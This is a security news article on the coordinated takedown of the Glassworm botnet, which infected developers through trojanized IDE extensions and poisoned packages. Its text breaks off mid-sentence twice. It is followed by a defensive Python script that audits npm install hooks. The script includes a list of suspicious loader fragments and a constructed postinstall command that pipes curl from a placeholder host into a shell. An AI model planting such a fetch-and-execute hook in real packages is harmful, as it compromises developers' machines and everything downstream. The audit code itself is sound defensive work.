How cybersecurity firms took down Glassworm botnet in one shot

https://securityaffairs.com/192749/cyber-crime/how-cybersecurity-firms-took-down-glassworm-botnet-in-one-shot.html

Publish Date: 2026-05-27 08:11:00

Source Domain: securityaffairs.com

Pierluigi Paganini
May 27, 2026

Glassworm infected developers through poisoned tools and packages until a coordinated takedown killed all four of its C2 channels at once.

On May 26, 2026, at 14:00 UTC, CrowdStrike's Counter Adversary Operations team, working with Google and the Shadowserver Foundation, killed all four command-and-control channels of the Glassworm botnet at the same time. The timing was the whole point: a botnet with several independent C2 channels survives the loss of any one of them, so the channels had to go down together rather than one at a time.

Glassworm has been targeting software developers since at least early 2025. That’s a deliberate choice. Developers have access to source code, cloud credentials, CI/CD pipelines, and package registries. Compromise one developer’s machine and you potentially own everything downstream that developer has ever touched.

The GlassWorm campaign, active since 2025, has evolved from malicious npm packages to large-scale supply chain attacks across GitHub, npm, and VS Code, even deploying RATs via fake browser extensions.

In its latest iteration, threat actors used a malicious OpenVSX extension impersonating WakaTime, bundling a Zig-compiled binary. Instead of acting as the payload, the binary serves as a stealthy dropper that infects multiple IDEs on a system, showing the group’s continuous adapt

The operators ran three parallel infection campaigns. Trojanized VS Code extensions published to the OpenVSX marketplace posed as legitimate tools like time trackers and code formatters, targeting not just VS Code but also Cursor, Windsurf, VSCodium, and others. Malicious npm and Python packages executed harmful code silently during routine dependency installation. And more than 300 GitHub repositories were poisoned using developer credentials stolen from earlier Glassworm infections, with malicious code force-pushed into default branches. Not bad for a group that apparently had nothing better to do for over a…
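The second vector above, packages that run code "silently during routine dependency installation", works because npm executes lifecycle scripts (preinstall, install, postinstall, prepare) automatically during `npm install`, before any application code is ever imported. The script below is an added example, not code from the article, from CrowdStrike, Google or Shadowserver, and not based on any Glassworm sample: it walks a node_modules tree, lists every install-time hook it finds, and flags commands that contain fragments typical of a remote loader. The package names, the sample tree and the `example.invalid` URL are constructed for the demo; treat the fragment list as a triage heuristic, not a signature.

```python
"""Audit a node_modules tree for install-time lifecycle hooks (added example)."""
import json
import os
import tempfile

# npm runs these automatically during install; a malicious package that wants
# to execute on the developer's machine hides its loader in one of them.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Fragments that often appear in install-time loaders. Assumption-driven
# heuristic: a hit means "read this script", not "this package is malicious".
SUSPICIOUS_FRAGMENTS = (
    "curl ", "wget ", "| sh", "| bash", "base64", "eval(", "child_process", "node -e",
)


def find_install_hooks(root):
    """Return one dict per lifecycle hook declared under root, sorted by package."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        if "package.json" not in files:
            continue
        path = os.path.join(dirpath, "package.json")
        try:
            with open(path, encoding="utf-8") as fh:
                manifest = json.load(fh)
        except (OSError, ValueError):
            continue  # unreadable or not JSON: skip it, but keep auditing the rest
        scripts = manifest.get("scripts") or {}
        for hook in INSTALL_HOOKS:
            cmd = scripts.get(hook)
            if not cmd:
                continue
            findings.append({
                "package": manifest.get("name", os.path.relpath(dirpath, root)),
                "hook": hook,
                "command": cmd,
                "suspicious": any(frag in cmd for frag in SUSPICIOUS_FRAGMENTS),
            })
    return sorted(findings, key=lambda f: (f["package"], f["hook"]))


def build_sample_tree():
    """Construct a throwaway node_modules tree with made-up packages for the demo."""
    root = tempfile.mkdtemp(prefix="nm-audit-")
    packages = {
        # plain library, no hooks at all
        "left-pad-clean": {"name": "left-pad-clean", "version": "1.0.0"},
        # legitimate native addon: an install hook that compiles code is normal
        "native-addon": {"name": "native-addon", "scripts": {"install": "node-gyp rebuild"}},
        # constructed loader pattern: fetch-and-execute from a made-up host
        "evil-formatter": {
            "name": "evil-formatter",
            "scripts": {
                "postinstall": "node -e \"require('child_process')"
                               ".exec('curl https://example.invalid/x | sh')\"",
            },
        },
    }
    for dirname, manifest in packages.items():
        pkg_dir = os.path.join(root, "node_modules", dirname)
        os.makedirs(pkg_dir)
        with open(os.path.join(pkg_dir, "package.json"), "w", encoding="utf-8") as fh:
            json.dump(manifest, fh)
    return root


if __name__ == "__main__":
    tree = build_sample_tree()
    for f in find_install_hooks(tree):
        flag = "SUSPICIOUS" if f["suspicious"] else "review"
        print(f"{flag:10} {f['package']:16} {f['hook']:12} {f['command']}")
```

Point it at a real project's node_modules to see which dependencies get code execution at install time. The stronger control is to not run hooks at all: `npm config set ignore-scripts true` (or `ignore-scripts=true` in `.npmrc`) disables them globally, after which the few packages that genuinely need a build step are rebuilt explicitly. Python packages are a separate problem, since `pip install` of an sdist executes `setup.py`; the same idea applies there (prefer wheels, pin hashes), but this script does not cover it.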
